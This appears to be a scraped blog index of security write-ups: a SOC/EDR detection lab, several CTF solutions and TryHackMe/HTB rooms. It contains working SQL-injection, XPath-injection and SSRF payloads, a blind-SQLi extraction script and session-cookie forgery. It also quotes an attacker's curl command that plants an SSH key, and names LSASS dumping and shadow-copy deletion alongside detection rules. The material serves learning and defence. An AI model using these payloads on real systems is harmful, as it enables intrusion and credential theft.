[992] svchost.exe │ │ │ ├── [1284] ShellExperienceHost.exe │ │ │ ├── [1580] RuntimeBroker.exe │ │ │ ├── [3240] BackgroundTransferHost.exe │ │ │ ├── [4376] backgroundTaskHost.exe │ │ │ ├── [5572] RuntimeBroker.exe │ │ │ ├── [740] unsecapp.exe │ │ │ ├── [1156] dllhost.exe │ │ │ ├── [5608] SearchApp.exe │ │ │ ├── [6004] RuntimeBroker.exe │ │ │ ├── [4352] RuntimeBroker.exe │ │ │ ├── [2476] WmiPrvSE.exe │ │ │ ├── [3680] WmiPrvSE.exe │ │ │ ├── [3892] TextInputHost.exe │ │ │ ├── [3932] StartMenuExperienceHost.exe │ │ │ ├── [4488] MoUsoCoreWorker.exe │ │ │ ├── [1256] RuntimeBroker.exe │ │ │ ├── [3552] smartscreen.exe │ │ │ ├── [5064] SearchApp.exe │ │ │ └── [1216] TiWorker.exe │ │ ├── [2984] dllhost.exe │ │ ├── [2092] TrustedInstaller.exe │ │ ├── [2376] svchost.exe │ │ ├── [3912] SearchIndexer.exe │ │ ├── [5652] svchost.exe │ │ ├── [1172] svchost.exe │ │ │ ├── [3152] ctfmon.exe │ │ │ └── [4800] CompatTelRunner.exe │ │ │ └── [2944] conhost.exe │ │ ├── [1520] svchost.exe │ │ ├── [1532] svchost.exe │ │ ├── [1832] msdtc.exe │ │ ├── [736] svchost.exe │ │ ├── [4852] sppsvc.exe │ │ ├── [5172] svchost.exe │ │ ├── [1292] svchost.exe │ │ ├── [1628] svchost.exe │ │ ├── [1640] svchost.exe │ │ └── [2120] svchost.exe │ ├── [876] lsass.exe │ └── [1016] fontdrvhost.exe ├── [784] winlogon.exe │ ├── [1008] fontdrvhost.exe │ └── [1040] dwm.exe ├── [3328] explorer.exe │ ├── [3512] SecurityHealthSystray.exe │ ├── [3880] vmtoolsd.exe │ ├── [4272] OneDrive.exe │ └── [6984] cmd.exe │ ├── [1696] CONTINUED_CARRY.exe │ └── [3612] conhost.exe ├── [6808] setup.exe │ ├── [7032] setup.exe │ └── [3008] MicrosoftEdgeUpdate.exe └── [6952] Microsoft.SharePoint.exe ⚠️ Security Product(s): Sysmon64, Windows Smart Screen Inturn we can observe the malware in the limacharlie telementery. We can detect our maliciuos process apart from the the legitimate processes. we can also view it network connections.\nIntrusion I can steal creds by dumping lsass.exe from the windows box memory to my attack machine\nThis will generate telementery in limacharkie that we can search with \u0026ldquo;SENSITIVE_PROCESS_ACCESS\u0026rdquo;\nWe can create an edr rule to alert once this type of activity occurs\n1 2 3 4 event: SENSITIVE_PROCESS_ACCESS op: ends with path: event/*/TARGET/FILE_PATH value: lsass.exe This rule will detect \u0026ldquo;SENSITIVE_PROCEE_ACCESS\u0026rdquo; with process being \u0026ldquo;lsass.exe\u0026rdquo;\nTo respond we use:\n1 2 - action: report name: LSASS access This will generate a detection report that we can view in the detections menu.\nBlocking attacks Here we are going to craft rules to take action when detections are made\nin thbis i ran thsi command :\n1 vssadmin delete shadows /all Which will delete volume shadow copies. This is just an example of a process that may indicate suspicious activity on a system\nThen we craft an Response rule:\nThis rule will terminate the parent process when it is detected.\n1 2 3 4 5 6 - action: report name: vss_deletion_kill_it - action: task command: - deny_tree - \u0026lt;\u0026lt;routing/parent\u0026gt;\u0026gt; This hung shell is an indication that it worked succesfully\nTuning False Positives Here we craft a false positive detection rule. This is whereby we can prevent alerts when normal system processes are run, thus causing alot of noise.\nI crafted to detect when whoami.exe is run. This is just an example.\n1 2 3 4 5 6 7 8 9 10 11 op: and rules: - op : is path: cat value: Whoami Utility Execution - op: is path: detect/event/FILE_PATH value: C:\\Windows\\system32\\whoami.exe - op: is path: detect/event/COMMAND_LINE value: \u0026#39;\u0026#34;C:\\Windows\\system32\\whoami.exe\u0026#34;\u0026#39; After testing it:\nIt works!!\nIf i run whoami when the rule is enabled i get no alaert, however whn i disable it i get an alert.\nAutomated Yara Scanning 1 2 YARA is a tool primarily used for identifying and classifying malware based on textual or binary patterns. It allows researchers and security professionals to craft rules that describe unique characteristics of specific malware families or malicious behaviors. There are well crafted rules for sliver (our c2 server) on the internet. We will use this \u0026raquo; here\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 ule sliver_github_file_paths_function_names { meta: author = \u0026#34;NCSC UK\u0026#34; description = \u0026#34;Detects Sliver Windows and Linux implants based on paths and function names within the binary\u0026#34; strings: $p1 = \u0026#34;/sliver/\u0026#34; $p2 = \u0026#34;sliverpb.\u0026#34; $fn1 = \u0026#34;RevToSelfReq\u0026#34; $fn2 = \u0026#34;ScreenshotReq\u0026#34; $fn3 = \u0026#34;IfconfigReq\u0026#34; $fn4 = \u0026#34;SideloadReq\u0026#34; $fn5 = \u0026#34;InvokeMigrateReq\u0026#34; $fn6 = \u0026#34;KillSessionReq\u0026#34; $fn7 = \u0026#34;ImpersonateReq\u0026#34; $fn8 = \u0026#34;NamedPipesReq\u0026#34; condition: (uint32(0) == 0x464C457F or (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)) and (all of ($p*) or 3 of ($fn*)) } rule sliver_proxy_isNotFound_retn_cmp_uniq { meta: author = \u0026#34;NCSC UK\u0026#34; description = \u0026#34;Detects Sliver implant framework based on some unique CMPs within the Proxy isNotFound function. False positives may occur\u0026#34; strings: $ = {C644241800C381F9B3B5E9B2} $ = {8B481081F90CAED682} condition: (uint32(0) == 0x464C457F or (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)) and all of them } rule sliver_nextCCServer_calcs { meta: author = \u0026#34;NCSC UK\u0026#34; description = \u0026#34;Detects Sliver implant framework based on instructions from the nextCCServer function. False positives may occur\u0026#34; strings: $ = {4889D3489948F7F94839CA????48C1E204488B0413488B4C1308} condition: (uint32(0) == 0x464C457F or (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)) and all of them } We will also need a rule to detect when yara is matched.\n1 2 3 4 5 6 7 8 event: YARA_DETECTION op: and rules: - not: true op: exists path: event/PROCESS/* - op: exists path: event/RULE_NAME From here we can create rules to automatically scan new executables and those in the downloads directory.\nWith this we can uleash the full power of the EDR to scan and detect malicious processes and files\nUntil next time!! HACK THE PLANET\n","date":"2024-02-06T15:57:25+03:00","image":"https://f0rk3b0mb.github.io/cover/soc_lab.jpg","permalink":"https://f0rk3b0mb.github.io/p/soc_analyst_lab/","title":"Soc_analyst_lab"},{"content":"Writeup for challenges in knightctf 2024\nweb kitty Tetanus is a serious, potentially life-threatening infection that can be transmitted by an animal bite.\nN:B: There is no need to do bruteforce.\nHere its obvious that it is sqli , login bypas to be precise\n1 payload: \u0026#34; or 1=1-- - since it was in json we you had to excape the first double-quote\nREADME This challenge entailed bypass a 403 response to be able to read the flag. The methos to exploit this is by using special http headers. see here\nUsing burp intruder , we get the flag\nGain access 1 For this challenge we are given a login page. It obvious the vuln is login bypass.\nInspecting the page source code we can see a comment with the root email \u0026ldquo;root@knightctf.com\u0026rdquo;\n1 payload : root@knightctf.com\u0026#39;-- - Gain access 2 For this challnege we are also given a login page. Viewing the page source we can see a comment that indicated there is a path notesssssss.txt. Visiting it\u0026hellip;\n1 2 I\u0026#39;ve something for you. Think..... root@knightctf.com:d05fcd90ca236d294384abd00ca98a2d The hash is md5 since it has a length of 32. Using this \u0026raquo; site we find the password as \u0026ldquo;letmein_kctf2024\u0026rdquo;\nLogging in we get a OTP verification page. It is vulnerable to sqli\n1 payload : anything\u0026#39; or 1=1-- - We then get access to the dashboard\nI got stuck here , will update when the ctf ends. :)\nUpdate:\nAfter you get the password , there is ana OTP page . The page also has an option to resend otp which requires you to enter an email. If we eneter the email roor@knightctf.com. That we had earlier we can see that it accepts it. Note: I had tries this methos earlier but i used the wrong format.\nSo you can send several email as an array []\n1 2 3 4 { \u0026#34;email\u0026#34;: [\u0026#34;root@knightctf.com\u0026#34;,\u0026#34;attacker@email.com\u0026#34;] } This will send the OTP code to both emails. Using the OTP code we get the flag\nCREDIT: @T3l3sc0p3\nNetworking For the networking challs check out my teammates writeups on them \u0026raquo;\nhere ","date":"2024-01-20T22:14:59+03:00","image":"https://f0rk3b0mb.github.io/cover/knightctf.jpg","permalink":"https://f0rk3b0mb.github.io/p/knightctf_2024/","title":"Knightctf_2024"},{"content":"Whats my password solve script category : web difficulty: easy\nVulnerability is error based blind sqli\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 import requests import string import json url=\u0026#34;http://whats-my-password-web.chal.irisc.tf/api/login\u0026#34; #found_char=[\u0026#39;i\u0026#39;, \u0026#39;r\u0026#39;, \u0026#39;i\u0026#39;, \u0026#39;s\u0026#39;, \u0026#39;c\u0026#39;, \u0026#39;t\u0026#39;, \u0026#39;f\u0026#39;, \u0026#39;{\u0026#39;, \u0026#39;m\u0026#39;, \u0026#39;y\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;p\u0026#39;, \u0026#39;4\u0026#39;, \u0026#39;2\u0026#39;, \u0026#39;2\u0026#39;,\u0026#39;W\u0026#39;, \u0026#39;0\u0026#39;, \u0026#39;R\u0026#39;, \u0026#39;D\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;1\u0026#39;, \u0026#39;S\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;S\u0026#39;, \u0026#39;Q\u0026#39;, \u0026#39;l\u0026#39;, \u0026#39;1\u0026#39;,\u0026#39;}\u0026#39;] found_char=[] headers={\u0026#34;Content-Type\u0026#34;:\u0026#34;application/json\u0026#34;} def main(): for x in range(len(found_char),50): for i in string.printable[:-6]: username = \u0026#34;skat\u0026#34; password = f\u0026#34;\\\u0026#34; or 1=(IF(SUBSTR((SELECT password from users where username=\u0026#39;skat\u0026#39;),{x},1)=\u0026#39;{i}\u0026#39;, 1,2))-- -\u0026#34; data = {\u0026#34;username\u0026#34;: username, \u0026#34;password\u0026#34;: password} sdata=json.dumps(data) r=requests.post(url,data=sdata,headers=headers) if \u0026#34;root\u0026#34; in r.text: found_char.append(i) print(found_char) break main() flag: irisctf{my_p422W0RD_1S_SQl1} ","date":"2024-01-06T18:29:32+03:00","image":"https://f0rk3b0mb.github.io/cover/iris.png","permalink":"https://f0rk3b0mb.github.io/p/irisctf_whats_my_password/","title":"Irisctf_whats_my_password"},{"content":"Writeup of htb sherlock Meerkat rating: easy\nWe believe our Business Management Platform server has been compromised. Please can you confirm the name of the application running? we can filter the meerkat-alerts.json with\u0026hellip;\n1 2 3 4 cat meerkat-alerts.json |jq |grep signature | grep -v python the bmp name is in the signature ans: Bonitasoft\nWe believe the attacker may have used a subset of the brute forcing attack category - what is the name of the attack carried out? From the meerkat-alerts.json and from pacap file we can see that there was alot of alerts on python-requests and we can see the requests tested different creds. This is possible Credential Stuffing\nans: Credential Stuffing\nDoes the vulnerability exploited have a CVE assigned - and if so, which one? Here use the same command as question1 , the cve is in the signature\nans: CVE-2022-25237\nWhich string was appended to the API URL path to bypass the authorization filter by the attacker\u0026rsquo;s exploit? in this case i used tshark to analyse the pcap.\n1 2 3 4 tshark -r meerkat.pcap -Y \u0026#34;http.request.method == POST\u0026#34; -T fields -e http.request.uri | grep -i api filter post requests , get the url path and grep for the api endpoints i18ntranslation\nHow many combinations of usernames and passwords were used in the credential stuffing attack? here we filter post requests, the we remove \u0026ldquo;username=install\u0026amp;password=install\u0026amp;_l=en\u0026rdquo; , i also removed \u0026ldquo;/bonita/API/portal/page/;i18ntranslation\u0026rdquo; and \u0026ldquo;/bonita/API/pageUpload;i18ntranslation?action=add\u0026rdquo; which were not login requests then pipe the output to uniq\n1 2 tshark -r meerkat.pcap -Y \u0026#34;http.request.method == POST\u0026#34; -T fields -e http.request.uri -e http.file_data | grep -v \u0026#34;username=install\u0026amp;password=install\u0026amp;_l=en\u0026#34; | grep -v \u0026#34;/bonita/API/portal/page/;i18ntranslation\u0026#34; | grep -v \u0026#34;/bonita/API/pageUpload;i18ntranslation?action=add\u0026#34; | uniq | wc -l ans: 56\nWhich username and password combination was successful? From the query above without uniq , the last combination has a different http.file_data , yoll have to check through wireshark but the ans is \u0026hellip;\nans: seb.broom@forela.co.uk:g0vernm3nt\nIf any, which text sharing site did the attacker utilise? As i was analysing the pcap using this query we can get the full uri. the url is part of parameters\n1 tshark -r meerkat.pcap -T fields -e http.request.full_uri | uniq ans: pastes.io\nPlease provide the filename of the public key used by the attacker to gain persistence on our host. Visiting the url we get a bash script with the following content\u0026hellip; hxxps[://]pastes[.]io/raw/bx5gcr0et8\n1 2 3 #!/bin/bash curl https://pastes.io/raw/hffgra4unv \u0026gt;\u0026gt; /home/ubuntu/.ssh/authorized_keys sudo service ssh restart ans: hffgra4unv\nCan you confirmed the file modified by the attacker to gain persistence? see above\nans: /home/ubuntu/.ssh/authorized_keys\nCan you confirm the MITRE technique ID of this type of persistence mechanism? this technique of using ssh authorized keys has id T1098.004. You can get this by visiting mitre website or googling or use chatgpt idc.\nans: T1098.004\n","date":"2023-12-20T14:43:14+03:00","permalink":"https://f0rk3b0mb.github.io/p/htb-sherlock-meerkat/","title":"Htb Sherlock Meerkat"},{"content":"Thm Investigating with splunk This room is for pactice on the Jnuior Penetration tester path on TryHackMe \u0026raquo;\u0026gt; here\nHow many events were collected and Ingested in the index main? 1 2 3 index=\u0026#34;main\u0026#34; ans: 12256 On one of the infected hosts, the adversary was successful in creating a backdoor user. What is the new username? 1 2 3 index=main EventID=\u0026#34;4720\u0026#34; ans: A1berto On the same host, a registry key was also updated regarding the new backdoor user. What is the full path of that registry key? 1 2 3 4 index=main Hostname=\u0026#34;Micheal.Beaven\u0026#34; EventID=\u0026#34;12\u0026#34; A1berto ans : HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\A1berto Examine the logs and identify the user that the adversary was trying to impersonate. 1 2 3 4 5 6 7 The attacker account is called A1berto the real account is Alberto with an \u0026#39;L\u0026#39; index=main (User section) ans : Alberto What is the command used to add a backdoor user from a remote computer? 1 2 3 4 index=main EventID=\u0026#34;4688\u0026#34; ans: \u0026#34;C:\\windows\\System32\\Wbem\\WMIC.exe\u0026#34; /node:WORKSTATION6 process call create \u0026#34;net user /add A1berto paw0rd1\u0026#34; How many times was the login attempt from the backdoor user observed during the investigation? 1 2 3 4 5 6 index=main EventID=\u0026#34;4624\u0026#34; \u0026lt;\u0026lt; succesful logon\u0026gt;\u0026gt; index=main EventID=\u0026#34;4625\u0026#34; \u0026lt;\u0026lt;unsuccesful logon\u0026gt;\u0026gt; both return no results ans : 0 What is the name of the infected host on which suspicious Powershell commands were executed? 1 2 3 index=main powershell ans : James.browne PowerShell logging is enabled on this device. How many events were logged for the malicious PowerShell execution? 1 2 3 index=main EventID=\u0026#34;4103\u0026#34; ans: 79 An encoded Powershell script from the infected host initiated a web request. What is the full URL? 1 2 3 4 5 6 from question 7 check the first event base64 decode and use decode text utf-16le using cyberchef. The url is base64 encoded . Youll also have to defang the url ans: hxxp[://]10[.]10[.]10[.]5/news[.]php ","date":"2023-12-03T11:56:27+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_splunk/","title":"Thm_splunk"},{"content":"Wazuh This is a writeup of Wazuh module on tryhackme. This is in the SOC Level 1 path. \u0026raquo; here ENjoy :)\nWazuh is an opensource XDR and SIEM service\nIntro 1 2 3 4 5 6 7 8 9 10 11 12 13 1. When was Wazuh released? 2015 2. What is the term that Wazuh calls a device that is being monitored for suspicious activity and potential security threats? agent 3. Lastly, what is the term for a device that is responsible for managing these devices? manager Wazuh agents 1 2 3 4 5 6 7 8 9 1. How many agents does this Wazuh management server manage? 2 2. What are the status of the agents managed by this Wazuh management server? disconnected Wazuh Vulnerability Assessment \u0026amp; Security Events 1 2 3 4 1. How many \u0026#34;Security Event\u0026#34; alerts have been generated by the agent \u0026#34;AGENT-001\u0026#34;? 196 Collecting Windows Logs with Wazuh 1 2 3 4 5 6 7 8 9 1. What is the name of the tool that we can use to monitor system events? sysmon 2. What standard application on Windows do these system events get recorded to? event viewer Collecting Linux Logs with Wazuh 1 2 3 4 1. What is the full file path to the rules located on a Wazuh management server? /var/ossec/ruleset/rules Auditing Commands on Linux with Wazuh 1 2 3 4 5 6 7 8 9 1. What application do we use on Linux to monitor events such as command execution? auditd 2. What is the full path \u0026amp; filename for where the aforementioned application stores rules? /etc/audit/ruled.d/audit.rules Wazuh API 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 1. What is the name of the standard Linux tool that we can use to make requests to the Wazuh management server? curl 2. What HTTP method would we use to retrieve information for a Wazuh management server API? GET 3. What HTTP method would we use to perform an action on a Wazuh management server API? PUT 4. Use the API console to find the Wazuh server\u0026#39;s version. v4.2.5 Generating Reports with Wazuh 1 2 3 4 1. Analyse the report. What is the name of the agent that has generated the most alerts? agent-001 ","date":"2023-11-25T08:48:38+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_wazuh/","title":"Thm_wazuh"},{"content":"Hackthebox - Hack the boo 2023 writeup HauntMart Category: web Rating: Easy\nThis challenge had a downloadable part , it was a web applicatio that allowed a user to register and login and add a product.\nTo get the flag we have to login as admin.\nThe is a /addAdmin route but it only accepts requests from localhost\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 @api.route(\u0026#39;/addAdmin\u0026#39;, methods=[\u0026#39;GET\u0026#39;]) @isFromLocalhost def addAdmin(): username = request.args.get(\u0026#39;username\u0026#39;) if not username: return response(\u0026#39;Invalid username\u0026#39;), 400 result = makeUserAdmin(username) if result: return response(\u0026#39;User updated!\u0026#39;) return response(\u0026#39;Invalid username\u0026#39;), 400 I Tries using X-Forwarded-For headers but it didnt work.\nIf you look closer at the code there is a function to send a request to fetch the manual from a url.\nThis vulnerability is called ssrf (server side request forgery) check more \u0026raquo;\u0026gt; here\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 def downloadManual(url): safeUrl = isSafeUrl(url) if safeUrl: try: local_filename = url.split(\u0026#34;/\u0026#34;)[-1] r = requests.get(url) with open(f\u0026#34;/opt/manualFiles/{local_filename}\u0026#34;, \u0026#34;wb\u0026#34;) as f: for chunk in r.iter_content(chunk_size=1024): if chunk: f.write(chunk) return True except: return False return False There is also a poor attempt of a filter for the url\n1 2 3 4 5 6 7 8 9 blocked_host = [\u0026#34;127.0.0.1\u0026#34;, \u0026#34;localhost\u0026#34;, \u0026#34;0.0.0.0\u0026#34;] def isSafeUrl(url): for hosts in blocked_host: if hosts in url: return False return True We can easily bypass this , there are many routed to localhost other that the ones listed there. You can check them out \u0026raquo;\u0026gt; here\nFor me this one worked:\nNOTE: you can get the port that the app is listenig from in therun.py , we have to make a request to /api/addAdmin to make our user admin\n1 2 http://127.0.1.3:1337/api/addAdmin?username=test We get the flag as : HTB{A11_55RF_5C4rY_p4tch_3m_411!}\n","date":"2023-10-27T08:52:15+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/hack_the_boo2023/","title":"Hack_the_boo2023"},{"content":"Thm owasp Command Injection Practical 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 What strange text file is in the website root directory? cmd: ls drpepper.txt How many non-root/non-service/non-daemon users are there? What user is this app running as? cmd: whoami www-data What is the user\u0026#39;s shell set as? What version of Ubuntu is running? cmd: lsb_release -a 18.04.4 Print out the MOTD. What favorite beverage is shown? cmd: cat /etc/update-motd.d/00-header DR PEPPER Broken Authentication Practical 1 2 3 4 5 6 7 8 9 10 11 12 What is the flag that you found in darren\u0026#39;s account? fe86079416a21a3c99937fea8874b667 What is the flag that you found in arthur\u0026#39;s account? d9ac0f7db4fda460ac3edeb75d75e16e Sensitive Data Exposure 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 What is the name of the mentioned directory? /assets Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data? webapp.db Use the supporting material to access the sensitive data. What is the password hash of the admin user? 6eea9b7ef19179a06954edd0f6c05ceb Crack the hash. What is the admin\u0026#39;s plaintext password? qwertyuiop Login as the admin. What is the flag? THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl} XML External Entity 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 What is the name of the user in /etc/passwd falcon Where is falcon\u0026#39;s SSH key located? /home/falcon/.ssh/id_rsa What are the first 18 characters for falcon\u0026#39;s private key MIIEogIBAAKCAQEA7b Broken Access Control (IDOR Challenge) 1 2 3 4 5 6 7 8 9 10 Look at other users notes. What is the flag? payload : http://10.10.145.127/note.php?note=0 flag{fivefourthree} Security Misconfiguration 1 2 3 4 5 6 7 8 Hack into the webapp, and find the flag! creds: pensive:PensiveNotes thm{4b9513968fd564a87b28aa1f9d672e17} XSS 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 Navigate to http://10.10.98.36/ in your browser and click on the \u0026#34;Reflected XSS\u0026#34; tab on the navbar; craft a reflected XSS payload that will cause a popup saying \u0026#34;Hello\u0026#34;. ThereIsMoreToXSSThanYouThink On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address. ReflectiveXss4TheWin Then add a comment and see if you can insert some of your own HTML. HTML_T4gs On the same page, create an alert popup box appear on the page with your document cookies. W3LL_D0N3_LVL2 Change \u0026#34;XSS Playground\u0026#34; to \u0026#34;I am a hacker\u0026#34; by adding a comment and using Javascript. websites_can_be_easily_defaced_with_xss Insecure Deserialization 1 2 3 4 5 6 7 8 9 10 Who developed the Tomcat application? The Apache Software Foundation What type of attack that crashes services can be performed with insecure deserialization? denial of service Insecure Desirialization 1 2 3 4 5 6 7 8 9 10 11 1st flag (cookie value) THM{good_old_base64_huh} 2nd flag (admin dashboard) THM{heres_the_admin_flag} Insecure Deserialization - Code Execution 1 2 3 4 5 6 flag.txt 4a69a7ff9fd68 Components with know vulns 1 2 3 4 5 6 7 How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer) exploit : https://www.exploit-db.com/exploits/47887 1611 Insufficient Logging and Monitoring 1 2 3 4 5 6 7 8 9 10 What IP address is the attacker using? 49.99.13.16 What kind of attack is being carried out? brute force ","date":"2023-10-25T13:12:22+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_owasp/","title":"Thm_owasp"},{"content":"Blackhat Mea 2023 ctf writeup We participated this ctf as Chasing X fr334aks X L3v3l 6 and managed to get pos 178. It wasn\u0026rsquo;t easy. I Managed to solve the web challenge below.\nAuthy For this challenge we are provided with an api endpoint and challenge source\nAccording to the LoginController.go file we can create a user and login , the user password length should not be less than 6\nThe vulnerability occurs when the user passowrd value in the registration function is not the one being compared in the login function. To get the flag we have to login with a password of length \u0026lt; 6.\nThe vulnerable code:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 //registration if len(user.Password) \u0026lt; 6 { log.Error(\u0026#34;Password too short\u0026#34;) resp := c.JSON(http.StatusConflict, helper.ErrorLog(http.StatusConflict, \u0026#34;Password too short\u0026#34;, \u0026#34;EXT_REF\u0026#34;)) return resp } //login if len(password) \u0026lt; 6 { flag := os.Getenv(\u0026#34;FLAG\u0026#34;) res := \u0026amp;Flag{ Flag: flag, } resp := c.JSON(http.StatusOK, res) log.Info() return resp } With my vast ctf experience i could tell what i needed to do :)\nTHe logic is :\n1 2 3 4 5 user.Name := \u0026#34;😃\u0026#34; // Contains 1 emoji character lengthOfString := len(user.Name) // Length of the string (bytes) - 4 (UTF-8 encoding) lengthOfRuneSlice := len([]rune(user.Name)) // Length of rune slice (code points) - 1 So i sent the request for registration with the password as two smileys and login with the same password. In the backend the register will see a length of 8 and login will see a length of 2 thus solving the challenge\n1 2 3 4 5 curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; -d \u0026#39;{\u0026#34;Username\u0026#34;: \u0026#34;ping\u0026#34;, \u0026#34;Password\u0026#34;: \u0026#34;🤣🤣\u0026#34;, \u0026#34;Firstname\u0026#34;: \u0026#34;John\u0026#34;, \u0026#34;Lastname\u0026#34;: \u0026#34;Doe\u0026#34;}\u0026#39; http://af78671fe39ff1e0e18d2.playat.flagyard.com/registration curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; -d \u0026#39;{\u0026#34;Username\u0026#34;: \u0026#34;ping\u0026#34;, \u0026#34;Password\u0026#34;: \u0026#34;🤣🤣\u0026#34;}\u0026#39; http://af78671fe39ff1e0e18d2.playat.flagyard.com/login The ctf was great and see you in the next one\n","date":"2023-10-09T16:06:15+03:00","image":"https://f0rk3b0mb.github.io/cover/bh.png","permalink":"https://f0rk3b0mb.github.io/p/blackhat_mea_2023/","title":"Blackhat_mea_2023"},{"content":"Shehacks intervasity ctf 2023 This ctf onsite at usiu , nairobi . I particpated online.\nweb category\nGraph1 This was an easy chalenge that tested knowledge in graphql queries\nthe graphql endpoint was located at /graphql.\nfor more info on how to enumerate graphql \u0026raquo; here\nSo basicaly if we send the query below we get introspection on the grapql endpoint\n1 {__schema{types{name,fields{name}}}} You can then use \u0026raquo; here to visualize the schema\nremember to set the content-type to \u0026ldquo;appication/graphql\u0026rdquo; when sending the request\nFrom this we find out that there is a field known as getFlag. We can then run the query below to get the flag . It was base64 encoded , so we decode it to get the flag\nX marks the spot In this challenge we are given a web application login field , i tried sql injection at first an an error was thrown\n1 SimpleXMLElement::xpath(): Invalid predicate in \u0026lt;b\u0026gt;/var/www/html/backend.php This indicated that the appication is vulnerable to xpath injection\nyou can check the payloads \u0026raquo; hacktricks xpath\ni tried the payload\n1 \u0026#39;or 1=1 or\u0026#39; this is able to bypass login and i get the result\n1 {\u0026#34;username\u0026#34;:\u0026#34;admin\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;supersecret\u0026#34;,\u0026#34;api-key\u0026#34;:\u0026#34;api-admin-key\u0026#34;} to move laterally through accounts i used the following payload , i achieved this after after trying lots of payloads\n1 \u0026#39;or position()=3 or\u0026#39; by changing the number above we can basically login as different users , in this case 3 gets us the flag.\nPS i got first blood on this challenge :)\n1 {\u0026#34;username\u0026#34;:\u0026#34;ali\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;654321\u0026#34;,\u0026#34;api-key\u0026#34;:\u0026#34;flag{s0m30n3_n33ds_1npu7_v4l1d4t10n}\u0026#34;} secrets For this challenge you are provided with a signin page and you can also register.\nWe have to manipulate the cookie to become the admin user. For this i used the tool flask-unsign , you can get it \u0026raquo; here\n1 2 3 flask-unsign --decode --cookie \u0026#34;.eJwljkFOBDEMBP-SM4fYjuN4PzOKYxtWiAHN7J4Qf2cQx26pSvVdtjzifCu3x_GMl7LdvdwKyJKcbQnKyJARCmralZw6kPrsiDrYxnSBmQ0SclBMrk5cRyUF55qcuRb2RSbDZGkjTsLBfXpQY21iyd2hUiYahseQBp2tXCHPM47_GuJrr_PI7fH5Hvv1rOE4Wpi4IjjMqmJx1UX1XqtPNKsa2C7uT7PPj7ior_v-Wn5-AZmVRW0.ZQ5wGQ.2gLkeklbQ2OS2GBjMTAi2uiVKWI\u0026#34; {\u0026#39;_fresh\u0026#39;: True, \u0026#39;_id\u0026#39;: \u0026#39;17c7fa4c7278fe78e919b9693d36139da622985b8ad71af41f1f83ea50d35080391d50f5ffcc26c3b78b7c9435f32856ade345947bf56d103ff2b2ede874165b\u0026#39;, \u0026#39;_user_id\u0026#39;: \u0026#39;35\u0026#39;, \u0026#39;csrf_token\u0026#39;: \u0026#39;c8d284eb7d921d1a097be93de0d600da2bb09e24\u0026#39;, \u0026#39;username\u0026#39;: \u0026#39;ping\u0026#39;} We then have to change the uid to 1 and username to admin and then sign the cookie with secretkey \u0026lsquo;SheHacks\u0026rsquo;\n1 2 3 4 flask-unsign --sign --cookie \u0026#34;{ \u0026#39;_user_id\u0026#39;: \u0026#39;1\u0026#39;, \u0026#39;username\u0026#39;: \u0026#39;admin\u0026#39;}\u0026#34; --secret \u0026#39;SheHacks\u0026#39; eyJfdXNlcl9pZCI6IjEiLCJ1c2VybmFtZSI6ImFkbWluIn0.ZQ59CA.CUKCpa3SPstLemcqmuEDrSqmpFI Using this cookie we can get the flag : flag{s3c3ts_4re_n0_l0ng3r_s4f3}\nforensics category\nSnifferDog1 How many packets in total passed through port 445 shctf{Ans}\nFor this we just use the filter \u0026ldquo;tcp.port == 445\u0026rdquo; then check the bottom right of wireshrk for number of packets shctf{10223}\nSniffer Dog2 What is the 6th disallowed item listed in http://192.168.56.103:8081/robots.txt?\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103 \u0026amp;\u0026amp; tcp.port == 8081 \u0026amp;\u0026amp; http\u0026rdquo; then find \u0026ldquo;robots.txt\u0026rdquo;\nshctf{installation}\nSnifferDog3 What version of Jenkins is running on 192.168.56.103? shctf{VersionOnly}\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103\u0026rdquo; then find \u0026ldquo;jenkins\u0026rdquo;\nshctf{1.647}\nSnifferDog4 What is the domain SID for 192.168.56.103 shctf{S\u0026hellip;}\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103\u0026rdquo; then find \u0026ldquo;S-1-5\u0026rdquo; this is the format for sid you can learn more \u0026raquo; here\nshctf{S-1-5-21-2950693484-2233299975-203034155}\n","date":"2023-09-22T14:29:32+03:00","image":"https://f0rk3b0mb.github.io/cover/shehacks.png","permalink":"https://f0rk3b0mb.github.io/p/shehacks_intrervasity_2023/","title":"Shehacks_intrervasity_2023"},{"content":"Windows event log analysis is an important skill in 